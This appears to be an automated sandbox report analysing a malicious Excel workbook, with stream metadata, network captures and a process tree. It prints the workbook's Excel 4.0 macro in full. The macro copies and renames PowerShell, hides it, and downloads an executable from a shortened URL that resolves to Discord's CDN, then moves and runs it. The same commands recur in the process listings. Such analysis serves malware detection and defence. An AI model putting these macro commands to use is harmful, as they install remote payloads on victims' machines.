Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 156

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	156
Entropy:	3.42617386685
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . l . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . L . . . . . . . X . . . . . . . d . . . . . . . . . . . . . . . . . . . A l e x i s U Z A N . @ . . . . L . z . . . . @ . . . . . . % ` . . . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 6c 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 08 00 00 00 38 00 00 00 0c 00 00 00 4c 00 00 00 0d 00 00 00 58 00 00 00 13 00 00 00 64 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 0c 00 00 00 41 6c 65 78 69 73 20 55 5a 41 4e 00 40 00 00 00

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 65416

General
Stream Path:	Workbook
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	65416
Entropy:	6.88571621138
Base64 Encoded:	True
Data ASCII:	. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . H P - P C s U Z A N B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . h . . . \\ : . # 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . . . .
Data Raw:	09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 48 50 2d 50 43 73 20 55 5a 41 4e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Macro 4.0 Code

"=EXEC(""cmd.exe /c robocopy %windir%\system32\WindowsPowerShell\v1.0\ %temp% powershell.exe /mt /z & exit"")""=EXEC(""cmd /c timeout /t 1 & cd %temp% & ren powershell.exe o.exe & exit"")""=EXEC(""cmd /c %temp%\o.exe -w 1 cd $env:temp; Start-Sleep 3; (get-item o.exe).Attributes += 'Hidden'"")""=WAIT(NOW()+""00:00:03"")""=EXEC(""cmd /c %temp%\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')"")""=EXEC(""cmd /c %temp%\o.exe -w 1 Start-Sleep 7; Move-Item """"vc.exe"""" -Destination """"$env:appdata"""""")""=EXEC(""cmd /c %temp%\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe;"")"=PAUSE()

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 19, 2020 09:32:52.715012074 CET	49733	443	192.168.2.3	104.20.138.65
Nov 19, 2020 09:32:52.734790087 CET	443	49733	104.20.138.65	192.168.2.3
Nov 19, 2020 09:32:52.734889030 CET	49733	443	192.168.2.3	104.20.138.65
Nov 19, 2020 09:32:52.814364910 CET	49733	443	192.168.2.3	104.20.138.65
Nov 19, 2020 09:32:52.831073999 CET	443	49733	104.20.138.65	192.168.2.3
Nov 19, 2020 09:32:52.833165884 CET	443	49733	104.20.138.65	192.168.2.3
Nov 19, 2020 09:32:52.833189011 CET	443	49733	104.20.138.65	192.168.2.3
Nov 19, 2020 09:32:52.833199024 CET	443	49733	104.20.138.65	192.168.2.3
Nov 19, 2020 09:32:52.833246946 CET	49733	443	192.168.2.3	104.20.138.65
Nov 19, 2020 09:32:52.838095903 CET	49733	443	192.168.2.3	104.20.138.65
Nov 19, 2020 09:32:52.854613066 CET	443	49733	104.20.138.65	192.168.2.3
Nov 19, 2020 09:32:52.854893923 CET	443	49733	104.20.138.65	192.168.2.3
Nov 19, 2020 09:32:52.906893969 CET	49733	443	192.168.2.3	104.20.138.65
Nov 19, 2020 09:32:52.923342943 CET	443	49733	104.20.138.65	192.168.2.3
Nov 19, 2020 09:32:53.401897907 CET	443	49733	104.20.138.65	192.168.2.3
Nov 19, 2020 09:32:53.401942015 CET	443	49733	104.20.138.65	192.168.2.3
Nov 19, 2020 09:32:53.401971102 CET	443	49733	104.20.138.65	192.168.2.3
Nov 19, 2020 09:32:53.402004957 CET	443	49733	104.20.138.65	192.168.2.3
Nov 19, 2020 09:32:53.402069092 CET	49733	443	192.168.2.3	104.20.138.65
Nov 19, 2020 09:32:53.402123928 CET	49733	443	192.168.2.3	104.20.138.65
Nov 19, 2020 09:32:53.459614038 CET	49734	443	192.168.2.3	162.159.129.233
Nov 19, 2020 09:32:53.471981049 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.472218990 CET	49734	443	192.168.2.3	162.159.129.233
Nov 19, 2020 09:32:53.474103928 CET	49734	443	192.168.2.3	162.159.129.233
Nov 19, 2020 09:32:53.486398935 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.491949081 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.492048979 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.492182016 CET	49734	443	192.168.2.3	162.159.129.233
Nov 19, 2020 09:32:53.492491961 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.492600918 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.492669106 CET	49734	443	192.168.2.3	162.159.129.233
Nov 19, 2020 09:32:53.681525946 CET	49734	443	192.168.2.3	162.159.129.233
Nov 19, 2020 09:32:53.693821907 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.694204092 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.710333109 CET	49734	443	192.168.2.3	162.159.129.233
Nov 19, 2020 09:32:53.722830057 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.744155884 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.744179964 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.744191885 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.744199991 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.744215965 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.744230032 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.744239092 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.744251966 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.744266033 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.744293928 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.744302988 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.744314909 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.744323015 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.744334936 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.744348049 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.744355917 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.744368076 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.744374990 CET	49734	443	192.168.2.3	162.159.129.233
Nov 19, 2020 09:32:53.744380951 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.744394064 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.744398117 CET	49734	443	192.168.2.3	162.159.129.233
Nov 19, 2020 09:32:53.744404078 CET	49734	443	192.168.2.3	162.159.129.233
Nov 19, 2020 09:32:53.744410038 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.744422913 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.744440079 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.744452953 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.744472027 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.744489908 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.744493961 CET	49734	443	192.168.2.3	162.159.129.233
Nov 19, 2020 09:32:53.744509935 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.744518995 CET	49734	443	192.168.2.3	162.159.129.233
Nov 19, 2020 09:32:53.744524956 CET	49734	443	192.168.2.3	162.159.129.233
Nov 19, 2020 09:32:53.744529963 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.744546890 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.744564056 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.744600058 CET	49734	443	192.168.2.3	162.159.129.233
Nov 19, 2020 09:32:53.744683981 CET	49734	443	192.168.2.3	162.159.129.233
Nov 19, 2020 09:32:53.745109081 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.745197058 CET	49734	443	192.168.2.3	162.159.129.233
Nov 19, 2020 09:32:53.745378017 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.745414972 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.745481014 CET	49734	443	192.168.2.3	162.159.129.233
Nov 19, 2020 09:32:53.745562077 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.745574951 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.745621920 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.745654106 CET	49734	443	192.168.2.3	162.159.129.233
Nov 19, 2020 09:32:53.745678902 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.745697021 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.745708942 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.745748043 CET	49734	443	192.168.2.3	162.159.129.233
Nov 19, 2020 09:32:53.745780945 CET	49734	443	192.168.2.3	162.159.129.233
Nov 19, 2020 09:32:53.745856047 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.746119976 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.746197939 CET	49734	443	192.168.2.3	162.159.129.233
Nov 19, 2020 09:32:53.746296883 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.746315002 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.746381998 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.746382952 CET	49734	443	192.168.2.3	162.159.129.233
Nov 19, 2020 09:32:53.746398926 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.746416092 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.746433973 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.746450901 CET	443	49734	162.159.129.233	192.168.2.3
Nov 19, 2020 09:32:53.746464014 CET	49734	443	192.168.2.3	162.159.129.233
Nov 19, 2020 09:32:53.746469975 CET	443	49734	162.159.129.233	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 19, 2020 09:31:31.741789103 CET	60831	53	192.168.2.3	8.8.8.8
Nov 19, 2020 09:31:31.754936934 CET	53	60831	8.8.8.8	192.168.2.3
Nov 19, 2020 09:31:32.903134108 CET	60100	53	192.168.2.3	8.8.8.8
Nov 19, 2020 09:31:32.915582895 CET	53	60100	8.8.8.8	192.168.2.3
Nov 19, 2020 09:31:33.916826010 CET	53195	53	192.168.2.3	8.8.8.8
Nov 19, 2020 09:31:33.929847956 CET	53	53195	8.8.8.8	192.168.2.3
Nov 19, 2020 09:31:35.075479031 CET	50141	53	192.168.2.3	8.8.8.8
Nov 19, 2020 09:31:35.089077950 CET	53	50141	8.8.8.8	192.168.2.3
Nov 19, 2020 09:31:36.116816998 CET	53023	53	192.168.2.3	8.8.8.8
Nov 19, 2020 09:31:36.129893064 CET	53	53023	8.8.8.8	192.168.2.3
Nov 19, 2020 09:31:36.976680040 CET	49563	53	192.168.2.3	8.8.8.8
Nov 19, 2020 09:31:36.992295980 CET	53	49563	8.8.8.8	192.168.2.3
Nov 19, 2020 09:31:42.882538080 CET	51352	53	192.168.2.3	8.8.8.8
Nov 19, 2020 09:31:42.894809961 CET	53	51352	8.8.8.8	192.168.2.3
Nov 19, 2020 09:31:44.111989021 CET	59349	53	192.168.2.3	8.8.8.8
Nov 19, 2020 09:31:44.158605099 CET	53	59349	8.8.8.8	192.168.2.3
Nov 19, 2020 09:31:44.486104012 CET	57084	53	192.168.2.3	8.8.8.8
Nov 19, 2020 09:31:44.511749983 CET	53	57084	8.8.8.8	192.168.2.3
Nov 19, 2020 09:31:44.823503971 CET	58823	53	192.168.2.3	8.8.8.8
Nov 19, 2020 09:31:44.836879015 CET	53	58823	8.8.8.8	192.168.2.3
Nov 19, 2020 09:31:45.499190092 CET	57084	53	192.168.2.3	8.8.8.8
Nov 19, 2020 09:31:45.512027025 CET	53	57084	8.8.8.8	192.168.2.3
Nov 19, 2020 09:31:46.503814936 CET	57084	53	192.168.2.3	8.8.8.8
Nov 19, 2020 09:31:46.524812937 CET	53	57084	8.8.8.8	192.168.2.3
Nov 19, 2020 09:31:48.500957966 CET	57084	53	192.168.2.3	8.8.8.8
Nov 19, 2020 09:31:48.514363050 CET	53	57084	8.8.8.8	192.168.2.3
Nov 19, 2020 09:31:48.698323965 CET	57568	53	192.168.2.3	8.8.8.8
Nov 19, 2020 09:31:48.710694075 CET	53	57568	8.8.8.8	192.168.2.3
Nov 19, 2020 09:31:52.501451969 CET	57084	53	192.168.2.3	8.8.8.8
Nov 19, 2020 09:31:52.514358997 CET	53	57084	8.8.8.8	192.168.2.3
Nov 19, 2020 09:31:58.914940119 CET	50540	53	192.168.2.3	8.8.8.8
Nov 19, 2020 09:31:58.927234888 CET	53	50540	8.8.8.8	192.168.2.3
Nov 19, 2020 09:32:00.446456909 CET	54366	53	192.168.2.3	8.8.8.8
Nov 19, 2020 09:32:00.459573030 CET	53	54366	8.8.8.8	192.168.2.3
Nov 19, 2020 09:32:01.536395073 CET	53034	53	192.168.2.3	8.8.8.8
Nov 19, 2020 09:32:01.561336994 CET	53	53034	8.8.8.8	192.168.2.3
Nov 19, 2020 09:32:11.895518064 CET	57762	53	192.168.2.3	8.8.8.8
Nov 19, 2020 09:32:11.908122063 CET	53	57762	8.8.8.8	192.168.2.3
Nov 19, 2020 09:32:20.207458973 CET	55435	53	192.168.2.3	8.8.8.8
Nov 19, 2020 09:32:20.227149963 CET	53	55435	8.8.8.8	192.168.2.3
Nov 19, 2020 09:32:21.277956963 CET	50713	53	192.168.2.3	8.8.8.8
Nov 19, 2020 09:32:21.296295881 CET	53	50713	8.8.8.8	192.168.2.3
Nov 19, 2020 09:32:21.341136932 CET	56132	53	192.168.2.3	8.8.8.8
Nov 19, 2020 09:32:21.354634047 CET	53	56132	8.8.8.8	192.168.2.3
Nov 19, 2020 09:32:21.391946077 CET	58987	53	192.168.2.3	8.8.8.8
Nov 19, 2020 09:32:21.411410093 CET	53	58987	8.8.8.8	192.168.2.3
Nov 19, 2020 09:32:46.098938942 CET	56579	53	192.168.2.3	8.8.8.8
Nov 19, 2020 09:32:46.125849962 CET	53	56579	8.8.8.8	192.168.2.3
Nov 19, 2020 09:32:52.648489952 CET	60633	53	192.168.2.3	8.8.8.8
Nov 19, 2020 09:32:52.661617994 CET	53	60633	8.8.8.8	192.168.2.3
Nov 19, 2020 09:32:53.444211006 CET	61292	53	192.168.2.3	8.8.8.8
Nov 19, 2020 09:32:53.456526041 CET	53	61292	8.8.8.8	192.168.2.3
Nov 19, 2020 09:32:56.976692915 CET	63619	53	192.168.2.3	8.8.8.8
Nov 19, 2020 09:32:56.995260954 CET	53	63619	8.8.8.8	192.168.2.3
Nov 19, 2020 09:33:23.189728022 CET	64938	53	192.168.2.3	8.8.8.8
Nov 19, 2020 09:33:23.202099085 CET	53	64938	8.8.8.8	192.168.2.3
Nov 19, 2020 09:33:25.075480938 CET	61946	53	192.168.2.3	8.8.8.8
Nov 19, 2020 09:33:25.109967947 CET	53	61946	8.8.8.8	192.168.2.3
Nov 19, 2020 09:34:00.039959908 CET	64910	53	192.168.2.3	8.8.8.8
Nov 19, 2020 09:34:00.058621883 CET	53	64910	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 19, 2020 09:32:52.648489952 CET	192.168.2.3	8.8.8.8	0x1383	Standard query (0)	tinyurl.com	A (IP address)	IN (0x0001)
Nov 19, 2020 09:32:53.444211006 CET	192.168.2.3	8.8.8.8	0x7ace	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Nov 19, 2020 09:32:52.661617994 CET	8.8.8.8	192.168.2.3	0x1383	No error (0)	tinyurl.com	104.20.138.65	A (IP address)	IN (0x0001)
Nov 19, 2020 09:32:52.661617994 CET	8.8.8.8	192.168.2.3	0x1383	No error (0)	tinyurl.com	104.20.139.65	A (IP address)	IN (0x0001)
Nov 19, 2020 09:32:52.661617994 CET	8.8.8.8	192.168.2.3	0x1383	No error (0)	tinyurl.com	172.67.1.225	A (IP address)	IN (0x0001)
Nov 19, 2020 09:32:53.456526041 CET	8.8.8.8	192.168.2.3	0x7ace	No error (0)	cdn.discordapp.com	162.159.129.233	A (IP address)	IN (0x0001)
Nov 19, 2020 09:32:53.456526041 CET	8.8.8.8	192.168.2.3	0x7ace	No error (0)	cdn.discordapp.com	162.159.130.233	A (IP address)	IN (0x0001)
Nov 19, 2020 09:32:53.456526041 CET	8.8.8.8	192.168.2.3	0x7ace	No error (0)	cdn.discordapp.com	162.159.133.233	A (IP address)	IN (0x0001)
Nov 19, 2020 09:32:53.456526041 CET	8.8.8.8	192.168.2.3	0x7ace	No error (0)	cdn.discordapp.com	162.159.135.233	A (IP address)	IN (0x0001)
Nov 19, 2020 09:32:53.456526041 CET	8.8.8.8	192.168.2.3	0x7ace	No error (0)	cdn.discordapp.com	162.159.134.233	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Nov 19, 2020 09:32:52.833199024 CET	104.20.138.65	443	192.168.2.3	49733	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc RSA CA-2, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc RSA CA-2, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Aug 03 02:00:00 CEST 2020 Mon Jan 27 13:46:39 CET 2020	Tue Aug 03 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025	769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,0	54328bd36c14bd82ddaa0c04b25ed9ad
Nov 19, 2020 09:32:52.833199024 CET	104.20.138.65	443	192.168.2.3	49733	CN=Cloudflare Inc RSA CA-2, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:46:39 CET 2020	Wed Jan 01 00:59:59 CET 2025		54328bd36c14bd82ddaa0c04b25ed9ad
Nov 19, 2020 09:32:53.492600918 CET	162.159.129.233	443	192.168.2.3	49734	CN=ssl711319.cloudflaressl.com CN=COMODO RSA Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=COMODO RSA Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Tue Oct 27 01:00:00 CET 2020 Thu Sep 25 02:00:00 CEST 2014 Thu Jan 01 01:00:00 CET 2004	Thu May 06 01:59:59 CEST 2021 Tue Sep 25 01:59:59 CEST 2029 Mon Jan 01 00:59:59 CET 2029	769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,0	54328bd36c14bd82ddaa0c04b25ed9ad
					CN=COMODO RSA Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	Thu Sep 25 02:00:00 CEST 2014	Tue Sep 25 01:59:59 CEST 2029
					CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Thu Jan 01 01:00:00 CET 2004	Mon Jan 01 00:59:59 CET 2029

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 6844 Parent PID: 792

General

Start time:	09:31:41
Start date:	19/11/2020
Path:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Imagebase:	0x60000
File size:	27110184 bytes
MD5 hash:	5D6638F2C8F8571C593999C58866007E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: cmd.exe PID: 7120 Parent PID: 6844

General

Start time:	09:31:46
Start date:	19/11/2020
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c robocopy %windir%\system32\WindowsPowerShell\v1.0\ %temp% powershell.exe /mt /z & exit
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: cmd.exe PID: 7140 Parent PID: 6844

General

Start time:	09:31:46
Start date:	19/11/2020
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c timeout /t 1 & cd %temp% & ren powershell.exe o.exe & exit
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 7148 Parent PID: 7120

General

Start time:	09:31:46
Start date:	19/11/2020
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: cmd.exe PID: 7156 Parent PID: 6844

General

Start time:	09:31:47
Start date:	19/11/2020
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c %temp%\o.exe -w 1 cd $env:temp; Start-Sleep 3; (get-item o.exe).Attributes += 'Hidden'
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 7164 Parent PID: 7140

General

Start time:	09:31:47
Start date:	19/11/2020
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 4308 Parent PID: 7156

General

Start time:	09:31:47
Start date:	19/11/2020
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: Robocopy.exe PID: 5776 Parent PID: 7120

General

Start time:	09:31:47
Start date:	19/11/2020
Path:	C:\Windows\SysWOW64\Robocopy.exe
Wow64 process (32bit):	true
Commandline:	robocopy C:\Windows\system32\WindowsPowerShell\v1.0\ C:\Users\user\AppData\Local\Temp powershell.exe /mt /z
Imagebase:	0x170000
File size:	103936 bytes
MD5 hash:	BB8F54AE10FDA174289A4A495809EB69
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: timeout.exe PID: 5568 Parent PID: 7140

General

Start time:	09:31:47
Start date:	19/11/2020
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 1
Imagebase:	0x11a0000
File size:	26112 bytes
MD5 hash:	121A4EDAE60A7AF6F5DFA82F7BB95659
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: cmd.exe PID: 4880 Parent PID: 6844

General

Start time:	09:31:50
Start date:	19/11/2020
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c %temp%\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: cmd.exe PID: 1708 Parent PID: 6844

General

Start time:	09:31:50
Start date:	19/11/2020
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c %temp%\o.exe -w 1 Start-Sleep 7; Move-Item 'vc.exe' -Destination '$env:appdata'
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 3564 Parent PID: 4880

General

Start time:	09:31:50
Start date:	19/11/2020
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: cmd.exe PID: 6260 Parent PID: 6844

General

Start time:	09:31:50
Start date:	19/11/2020
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c %temp%\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe;
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 5076 Parent PID: 1708

General

Start time:	09:31:50
Start date:	19/11/2020
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: o.exe PID: 6036 Parent PID: 4880

General

Start time:	09:31:51
Start date:	19/11/2020
Path:	C:\Users\user\AppData\Local\Temp\o.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
Imagebase:	0x1250000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Analysis Process: conhost.exe PID: 6072 Parent PID: 6260

General

Start time:	09:31:51
Start date:	19/11/2020
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
